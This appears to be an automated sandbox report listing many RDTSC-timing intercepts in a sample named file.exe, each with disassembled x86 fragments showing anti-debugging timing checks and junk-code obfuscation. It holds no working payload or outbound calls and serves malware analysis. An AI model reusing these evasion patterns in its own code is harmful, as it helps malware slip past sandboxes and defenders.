Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D151 second address: 50D1C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F3B7530A288h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 jmp 00007F3B7530A293h 0x00000028 push 00000000h 0x0000002a or bx, FBBCh 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F3B7530A288h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D1C3 second address: 50D1CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3B74DE4446h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D1CE second address: 50D1D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E133 second address: 50E196 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3B74DE4446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c mov bh, 45h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F3B74DE4448h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov edi, 3674C708h 0x0000002f mov dword ptr [ebp+122D2574h], esi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007F3B74DE4448h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 xor ebx, dword ptr [ebp+122D2514h] 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E196 second address: 50E19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E19B second address: 50E1A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F07C second address: 50F082 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F082 second address: 50F08C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F3B74DE4446h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F139 second address: 50F13D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 512133 second address: 51214C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007F3B74DE444Eh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51214C second address: 512159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3B7530A286h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 512159 second address: 51215E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51215E second address: 51216A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3B7530A286h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2DF5 second address: 4C2E12 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F3B74DE4451h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 512728 second address: 51272E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51272E second address: 512769 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 movsx ebx, cx 0x0000000c push 00000000h 0x0000000e xor bx, 2AA8h 0x00000013 push 00000000h 0x00000015 mov edi, dword ptr [ebp+1244E090h] 0x0000001b mov dword ptr [ebp+122D188Fh], esi 0x00000021 xchg eax, esi 0x00000022 push esi 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F3B74DE4456h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51381F second address: 513823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 513823 second address: 513899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+122D1EFCh], ebx 0x00000010 mov ebx, 47125A37h 0x00000015 push 00000000h 0x00000017 jl 00007F3B74DE444Ch 0x0000001d xor ebx, dword ptr [ebp+122D342Ch] 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F3B74DE4448h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 0000001Dh 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f mov edi, dword ptr [ebp+122D320Dh] 0x00000045 xchg eax, esi 0x00000046 push edx 0x00000047 pushad 0x00000048 jmp 00007F3B74DE444Bh 0x0000004d pushad 0x0000004e popad 0x0000004f popad 0x00000050 pop edx 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F3B74DE4451h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 513899 second address: 51389F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51389F second address: 5138A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515718 second address: 5157AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jns 00007F3B7530A29Bh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F3B7530A288h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 or dword ptr [ebp+1244E26Eh], ebx 0x0000002e xor dword ptr [ebp+122D1889h], ecx 0x00000034 push 00000000h 0x00000036 mov bl, ah 0x00000038 mov edi, edx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F3B7530A288h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 00000016h 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 mov ebx, dword ptr [ebp+122D352Ch] 0x0000005c xchg eax, esi 0x0000005d jmp 00007F3B7530A28Dh 0x00000062 push eax 0x00000063 je 00007F3B7530A298h 0x00000069 push eax 0x0000006a push edx 0x0000006b jc 00007F3B7530A286h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51291C second address: 512938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3B74DE4457h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 512938 second address: 51295D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3B7530A299h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51295D second address: 512967 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3B74DE4446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514A12 second address: 514A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514A16 second address: 514A1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514A1C second address: 514A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515947 second address: 51594B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51594B second address: 51594F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51594F second address: 515964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F3B74DE444Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517564 second address: 5175B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov di, 4EA0h 0x0000000c cmc 0x0000000d push 00000000h 0x0000000f mov dword ptr [ebp+1244AC67h], ebx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F3B7530A288h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 jmp 00007F3B7530A293h 0x00000036 mov ebx, 4C6E43F8h 0x0000003b xchg eax, esi 0x0000003c push edi 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5175B9 second address: 5175BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5175BD second address: 5175E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F3B7530A296h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5175E1 second address: 5175EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F3B74DE4446h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5168DD second address: 5168E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517715 second address: 51771B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51771B second address: 517721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517721 second address: 517725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517725 second address: 517729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517729 second address: 5177BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jbe 00007F3B74DE4448h 0x00000011 mov ebx, edi 0x00000013 push dword ptr fs:[00000000h] 0x0000001a jmp 00007F3B74DE4455h 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F3B74DE4448h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 00000016h 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 mov ebx, 3B962446h 0x00000045 mov eax, dword ptr [ebp+122D12DDh] 0x0000004b push 00000000h 0x0000004d push edx 0x0000004e call 00007F3B74DE4448h 0x00000053 pop edx 0x00000054 mov dword ptr [esp+04h], edx 0x00000058 add dword ptr [esp+04h], 00000015h 0x00000060 inc edx 0x00000061 push edx 0x00000062 ret 0x00000063 pop edx 0x00000064 ret 0x00000065 jnp 00007F3B74DE4449h 0x0000006b push FFFFFFFFh 0x0000006d cld 0x0000006e nop 0x0000006f push eax 0x00000070 push edx 0x00000071 jo 00007F3B74DE4448h 0x00000077 push ebx 0x00000078 pop ebx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518748 second address: 51874D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F466 second address: 51F46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5246DC second address: 524725 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jp 00007F3B7530A2A2h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007F3B7530A292h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 524725 second address: 524729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5247B8 second address: 5247BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52BA22 second address: 52BA49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jno 00007F3B74DE4446h 0x0000000d jmp 00007F3B74DE444Ah 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F3B74DE444Dh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C48E3 second address: 4C48F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B7530A290h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C48F7 second address: 4C4911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F3B74DE4446h 0x00000010 jmp 00007F3B74DE444Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A650 second address: 52A656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52AE56 second address: 52AE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52AE5A second address: 52AE7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B7530A290h 0x00000007 ja 00007F3B7530A286h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jne 00007F3B7530A286h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52AE7C second address: 52AE8B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3B74DE4448h 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B150 second address: 52B154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B3F5 second address: 52B3F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B3F9 second address: 52B409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F3B7530A286h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B409 second address: 52B40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B879 second address: 52B89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F3B7530A293h 0x0000000d popad 0x0000000e jne 00007F3B7530A28Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 533DCB second address: 533DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 533DD1 second address: 533DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jg 00007F3B7530A286h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 533DDF second address: 533DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 533DE8 second address: 533E02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B7530A28Fh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5343A6 second address: 5343AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5343AC second address: 5343B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534517 second address: 534525 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F3B74DE444Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53467F second address: 534685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534685 second address: 5346A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F3B74DE4451h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5346A2 second address: 5346A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5347FC second address: 534811 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B74DE444Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534811 second address: 534828 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F3B7530A286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F3B7530A28Eh 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534974 second address: 534998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3B74DE4446h 0x0000000a jnp 00007F3B74DE4446h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F3B74DE444Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534998 second address: 53499E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53499E second address: 5349BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3B74DE4454h 0x0000000c jl 00007F3B74DE4446h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5349BF second address: 5349C9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3B7530A286h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5349C9 second address: 5349CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5349CF second address: 5349EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B7530A298h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534E2C second address: 534E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534E32 second address: 534E36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534E36 second address: 534E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534E3C second address: 534E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F3B7530A286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534E46 second address: 534E64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B74DE4456h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534E64 second address: 534E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B21B1 second address: 4B21B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B21B5 second address: 4B21C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B21C0 second address: 4B21E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3B74DE444Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3B74DE444Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B21E1 second address: 4B21E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
